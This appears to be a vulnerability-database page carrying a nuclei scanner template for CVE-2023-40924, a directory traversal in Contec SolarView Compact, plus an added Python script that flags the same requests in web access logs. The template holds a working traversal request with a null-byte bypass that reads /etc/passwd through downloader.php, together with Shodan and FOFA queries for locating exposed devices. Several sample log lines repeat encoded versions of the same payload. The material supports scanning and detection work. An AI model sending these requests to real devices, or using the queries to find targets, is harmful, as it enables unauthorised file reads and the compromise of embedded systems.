SolarView Compact < 6.00 - Directory Traversal

šŸ—“ļøĀ 02 Jul 2026Ā 09:36:57Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 15Ā Views

Directory traversal in SolarView Compact before 6.00 lets an unauthenticated attacker read files through downloader.php.

Related
Reporter | Title | Published | Views | Family
ATTACKERKB | CVE-2023-40924 | 8 Sep 2023 13:15 | – | attackerkb
Circl | CVE-2023-40924 | 8 Sep 2023 16:19 | – | circl
CNNVD | Contec SolarView Compact Path Traversal Vulnerability | 8 Sep 2023 00:00 | – | cnnvd
CVE | CVE-2023-40924 | 8 Sep 2023 00:00 | – | cve
Cvelist | CVE-2023-40924 | 8 Sep 2023 00:00 | – | cvelist
EUVD | EUVD-2023-45463 | 3 Oct 2025 20:07 | – | euvd
NVD | CVE-2023-40924 | 8 Sep 2023 13:15 | – | nvd
OSV | CVE-2023-40924 | 8 Sep 2023 13:15 | – | osv
Prion | Directory traversal | 8 Sep 2023 13:15 | – | prion
Positive Technologies | PT-2023-27704 | 8 Sep 2023 00:00 | – | ptsecurity
id: CVE-2023-40924

info:
  name: SolarView Compact < 6.00 - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
  impact: |
    An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
  remediation: |
    Upgrade SolarView Compact to version 6.00 or later.
  reference:
    - https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40924
    epss-score: 0.02885
    epss-percentile: 0.85148
    cwe-id: CWE-22
    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.favicon.hash:"-244067125"
      - http.html:"solarview compact"
    fofa-query:
      - body="solarview compact"
      - icon_hash="-244067125"
  tags: cve,cve2023,lfi,solarview,contec,traversal,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c66bba0036a4e1f0324895ed121247907f5e788e2f3db6d8408f47ca68f8444a022100e418cda3e8e6c23ba55d5b530f30589ae3c11d6632608f107f067b1bc58c4625:922c64590222798bb761d5b6d8e72950
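
An added example, not part of the template or of the vendor's code: a check that finds the request pattern this template sends (parent-directory segments plus a null byte in the `file` parameter of downloader.php) in web access logs. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target and status code in a combined-log-format line (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Sep/2023:13:15:00 +0000] "GET /downloader.php?file=report.csv HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Sep/2023:13:16:02 +0000] "GET /downloader.php?file=../../../../etc/passwd%00.jpg HTTP/1.1" 200 812',
    '198.51.100.7 - - [08/Sep/2023:13:16:05 +0000] "GET /downloader.php?file=%252e%252e%252fetc%252fpasswd%2500.jpg HTTP/1.1" 404 0',
    '192.0.2.10 - - [08/Sep/2023:13:17:00 +0000] "GET /index.php?file=../x HTTP/1.1" 200 100',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the reasons a log line looks like this traversal (empty if none)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/downloader.php"):
        return []
    reasons = []
    # parse_qs decodes once; fully_decode handles any further encoding layers.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        value = fully_decode(raw)
        if "\x00" in value:
            reasons.append("null byte in file parameter")
        if ".." in re.split(r"[\\/]", value):
            reasons.append("parent-directory segment in file parameter")
        if value.startswith("/"):
            reasons.append("absolute path in file parameter")
    if reasons and m.group(2) == "200":
        reasons.append("server answered 200")
    return reasons

def scan(lines):
    """Map line index to reasons for every suspicious line."""
    hits = {i: classify(line) for i, line in enumerate(lines)}
    return {i: r for i, r in hits.items() if r}
```

A hit that also carries "server answered 200" deserves first attention, since the template itself treats a 200 response with passwd content as confirmation.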

06 Apr 2026 09:57 (current)
Vulners AI Score: 7.2 (High risk)
CVSS 3.1: 7.5
EPSS: 0.02885